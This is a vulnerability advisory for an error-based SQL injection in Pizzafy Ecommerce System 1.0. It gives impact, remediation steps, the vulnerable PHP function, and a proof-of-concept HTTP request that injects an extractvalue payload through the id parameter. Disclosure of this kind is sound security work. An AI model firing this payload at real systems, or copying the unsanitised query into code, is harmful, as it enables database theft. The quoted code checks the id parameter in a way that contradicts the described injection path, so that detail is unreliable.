# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0 ## Vulnerability Overview * **Vulnerability Type**: Error-Based SQL Injection * **Affected Version**: Pizzafy Ecommerce System 1.0 * **Vulnerable Location**: `get_cart_count` function in the `/pizzafy/admin/ajax.php` interface * **Triggering Parameter**: `id` parameter * **Description**: The backend code fails to filter the user-supplied `id` parameter, directly concatenating it into the SQL query statement. This allows attackers to retrieve sensitive database information by constructing malicious SQL statements. ## Impact Scope * **Confidentiality**: Leakage of database schema and user credentials. * **Integrity**: Unauthorized deletion or modification of data. * **Availability**: Service unavailability caused by malicious deletion. * **Privilege Escalation**: Acquisition of administrator privileges through session data hijacking. ## Remediation 1. **Use Prepared Statements**: Employ parameterized queries (e.g., `mysqli_prepare`) to prevent SQL injection. 2. **Input Validation**: Perform strict type checking on parameters such as `id` (e.g., allowing only integers). 3. **Database Privilege Restriction**: Limit database user privileges to minimize potential damage. 4. **Error Handling**: Avoid exposing detailed database error messages in responses. ## Vulnerable Code ```php public function get_cart_count() { if(!isset($_SESSION['login_user_id'])) return "0"; $user_id = $_SESSION['login_user_id']; if (!isset($_GET['id'])) { $user_id = $_GET['id']; } $sql = "SELECT SUM(qty) as total FROM cart WHERE user_id = $user_id"; $result = $this->conn->query($sql); if (!$result) { return $this->conn->error; } if($result && $result->num_rows > 0) { $row = $result->fetch_assoc(); } if(!is_numeric($row['total'])) { return json_encode($row); } return $row['total'] ? (string)$row['total'] : "0"; } ``` ## Proof of Concept (PoC) **GET Request Example:** ```http GET /pizzafy/admin/ajax.php?action=get_cart_count&id=1%20and%20extractvalue(1,%20concat(0x7e,%20version())) HTTP/1.1 Host: localhost sec-ch-ua: Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win6; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/index.php?page=home Accept-Encoding: gzip, deflate Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cookie: PHPSESSID=n149kjl2vwd4ra1063qunr95 Connection: close Content-Length: 0 ``` **Injected SQL Statement:** ```sql id=1%20and%20extractvalue(1,%20concat(0x7e,%20version()))%20-- ```